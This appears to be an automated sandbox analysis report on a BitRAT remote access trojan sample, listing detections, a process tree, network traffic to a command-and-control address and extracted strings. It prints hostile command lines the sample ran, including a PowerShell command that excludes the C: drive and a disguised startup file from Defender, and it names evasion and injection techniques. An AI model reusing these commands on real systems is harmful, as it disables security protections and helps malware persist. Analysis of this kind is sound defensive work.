Play interactive tour

Edit tour

Windows Analysis Report 0kEuVjiCbh.exe

Overview

General Information

Sample Name:	0kEuVjiCbh.exe
Analysis ID:	450613
MD5:	1aa4ec7db318a524fdfb5aaff61a1031
SHA1:	bb804be3028c6cbcc62e81fb70482c1a2444667f
SHA256:	ba47f657a4745c96a62c444100d6c38bbff772b47ac03e83dc3ef5d94bc1d77c
Tags:	BitRATexeRAT
Infos:
Most interesting Screenshot:

Detection

BitRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected BitRAT

.NET source code contains potential unpacker

Contains functionality to hide a thread from the debugger

Creates an undocumented autostart registry key

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Installs a global mouse hook

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

0kEuVjiCbh.exe (PID: 5952 cmdline: 'C:\Users\user\Desktop\0kEuVjiCbh.exe' MD5: 1AA4EC7DB318A524FDFB5AAFF61A1031)

wscript.exe (PID: 1308 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

powershell.exe (PID: 3120 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 3216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

0kEuVjiCbh.exe (PID: 4872 cmdline: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe MD5: 1AA4EC7DB318A524FDFB5AAFF61A1031)

0kEuVjiCbh.exe (PID: 4868 cmdline: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe MD5: 1AA4EC7DB318A524FDFB5AAFF61A1031)

0kEuVjiCbh.exe (PID: 3880 cmdline: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe MD5: 1AA4EC7DB318A524FDFB5AAFF61A1031)

0kEuVjiCbh.exe (PID: 1832 cmdline: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe MD5: 1AA4EC7DB318A524FDFB5AAFF61A1031)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: 0kEuVjiCbh.exe PID: 1832	JoeSecurity_BitRAT	Yara detected BitRAT	Joe Security
Process Memory Space: 0kEuVjiCbh.exe PID: 5952	JoeSecurity_BitRAT	Yara detected BitRAT	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\0kEuVjiCbh.exe' , ParentImage: C:\Users\user\Desktop\0kEuVjiCbh.exe, ParentProcessId: 5952, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs' , ProcessId: 1308

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\0kEuVjiCbh.exe' , ParentImage: C:\Users\user\Desktop\0kEuVjiCbh.exe, ParentProcessId: 5952, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs' , ProcessId: 1308

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe', CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1308, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe', ProcessId: 3120

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Metadefender: Detection: 14%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe	Metadefender: Detection: 14%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Show sources

Source: 0kEuVjiCbh.exe	Virustotal: Detection: 22%	Perma Link
Source: 0kEuVjiCbh.exe	Metadefender: Detection: 14%	Perma Link
Source: 0kEuVjiCbh.exe	ReversingLabs: Detection: 47%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: 0kEuVjiCbh.exe

Joe Sandbox ML: detected

Source: 0kEuVjiCbh.exe, 00000001.00000002.328677400.0000000003571000.00000004.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: 0kEuVjiCbh.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 0kEuVjiCbh.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_004269D4 GetFullPathNameW,FindFirstFileExW,GetLastError,

19_2_004269D4

Source: global traffic

TCP traffic: 192.168.2.3:49733 -> 185.244.30.28:4898

Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.30.28

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_00415782 WSARecv,

19_2_00415782

Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 0kEuVjiCbh.exe	String found in binary or memory: http://livesplit.org/
Source: powershell.exe, 0000000F.00000003.373305758.00000000033BE000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 0kEuVjiCbh.exe, 00000001.00000002.327234439.0000000002571000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000F.00000003.373305758.00000000033BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 0kEuVjiCbh.exe, 00000001.00000003.207839947.0000000005560000.00000004.00000001.sdmp, 0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp, 0kEuVjiCbh.exe, 00000001.00000003.206637249.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: 0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com(
Source: 0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comC
Source: 0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comL
Source: 0kEuVjiCbh.exe, 00000001.00000003.206637249.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comN
Source: 0kEuVjiCbh.exe, 00000001.00000003.206637249.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comR
Source: 0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp, 0kEuVjiCbh.exe, 00000001.00000003.206144045.0000000005562000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comTC
Source: 0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comTC1
Source: 0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comTCA
Source: 0kEuVjiCbh.exe, 00000001.00000003.206637249.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comal
Source: 0kEuVjiCbh.exe, 00000001.00000003.206669888.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comc
Source: 0kEuVjiCbh.exe, 00000001.00000003.206400818.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comd
Source: 0kEuVjiCbh.exe, 00000001.00000003.206400818.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comdd
Source: 0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comf
Source: 0kEuVjiCbh.exe, 00000001.00000003.206107547.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comht
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comm
Source: 0kEuVjiCbh.exe, 00000001.00000003.206107547.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.como.
Source: 0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.como.#
Source: 0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comorm
Source: 0kEuVjiCbh.exe, 00000001.00000003.206775258.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comp
Source: 0kEuVjiCbh.exe, 00000001.00000003.206400818.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comte
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 0kEuVjiCbh.exe, 00000001.00000003.208702779.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 0kEuVjiCbh.exe, 00000001.00000003.209231763.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers0
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 0kEuVjiCbh.exe, 00000001.00000003.208727567.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers:
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 0kEuVjiCbh.exe, 00000001.00000003.208922980.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersL
Source: 0kEuVjiCbh.exe, 00000001.00000003.208983955.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersR
Source: 0kEuVjiCbh.exe, 00000001.00000003.208755149.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersers
Source: 0kEuVjiCbh.exe, 00000001.00000003.208922980.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designerst
Source: 0kEuVjiCbh.exe, 00000001.00000003.324580096.0000000005539000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: 0kEuVjiCbh.exe, 00000001.00000003.324580096.0000000005539000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comcemfE
Source: 0kEuVjiCbh.exe, 00000001.00000003.324580096.0000000005539000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.compE
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 0kEuVjiCbh.exe, 00000001.00000003.205494812.000000000555E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnM
Source: 0kEuVjiCbh.exe, 00000001.00000003.205494812.000000000555E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnl-g~
Source: 0kEuVjiCbh.exe, 00000001.00000003.205494812.000000000555E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cntuE
Source: 0kEuVjiCbh.exe, 00000001.00000003.205494812.000000000555E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cny
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp, 0kEuVjiCbh.exe, 00000001.00000003.207720541.000000000553C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp//h(
Source: 0kEuVjiCbh.exe, 00000001.00000003.207272862.000000000553B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Hebr
Source: 0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/JE
Source: 0kEuVjiCbh.exe, 00000001.00000003.207272862.000000000553B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/TE
Source: 0kEuVjiCbh.exe, 00000001.00000003.207469413.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/fE
Source: 0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/TE
Source: 0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/fE
Source: 0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/pE
Source: 0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/xE
Source: 0kEuVjiCbh.exe, 00000001.00000003.208269954.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.%
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: 0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 0kEuVjiCbh.exe, 00000001.00000003.206010852.0000000005560000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn_tr
Source: 0kEuVjiCbh.exe, 0kEuVjiCbh.exe, 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: powershell.exe, 0000000F.00000003.373305758.00000000033BE000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000003.370635842.0000000005578000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Windows user hook set: 0 mouse low level NULL

Jump to behavior

System Summary:

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_0047DA23 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,

19_2_0047DA23

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_005CF200: CreateFileW,new,DeviceIoControl,CloseHandle,

19_2_005CF200

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_0240C104	1_2_0240C104
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_0240E540	1_2_0240E540
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_0240E550	1_2_0240E550
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB2C90	1_2_06FB2C90
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB053F	1_2_06FB053F
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB53F0	1_2_06FB53F0
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB5B60	1_2_06FB5B60
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Code function: 1_2_06FB6860	1_2_06FB6860
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0068C54E	19_2_0068C54E
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_004FA652	19_2_004FA652
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0040EA72	19_2_0040EA72
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0042AE39	19_2_0042AE39
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0042CF4C	19_2_0042CF4C
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_004BAF5C	19_2_004BAF5C
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_00693097	19_2_00693097
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0042711E	19_2_0042711E
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_004113C3	19_2_004113C3
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0069D3C0	19_2_0069D3C0
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0042D936	19_2_0042D936
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_00431A1E	19_2_00431A1E

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: String function: 00411DDD appears 141 times
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: String function: 0068A4E0 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: String function: 0068A19C appears 126 times
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: String function: 006B9C3C appears 811 times
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: String function: 005D8230 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: String function: 00411AAE appears 40 times
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: String function: 006909D0 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: String function: 0068E3DE appears 73 times

Source: 0kEuVjiCbh.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: discupdate.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 0kEuVjiCbh.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 0kEuVjiCbh.exe, 00000001.00000002.341784830.0000000006E90000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSedurqbglqrpygwxb.dll" vs 0kEuVjiCbh.exe
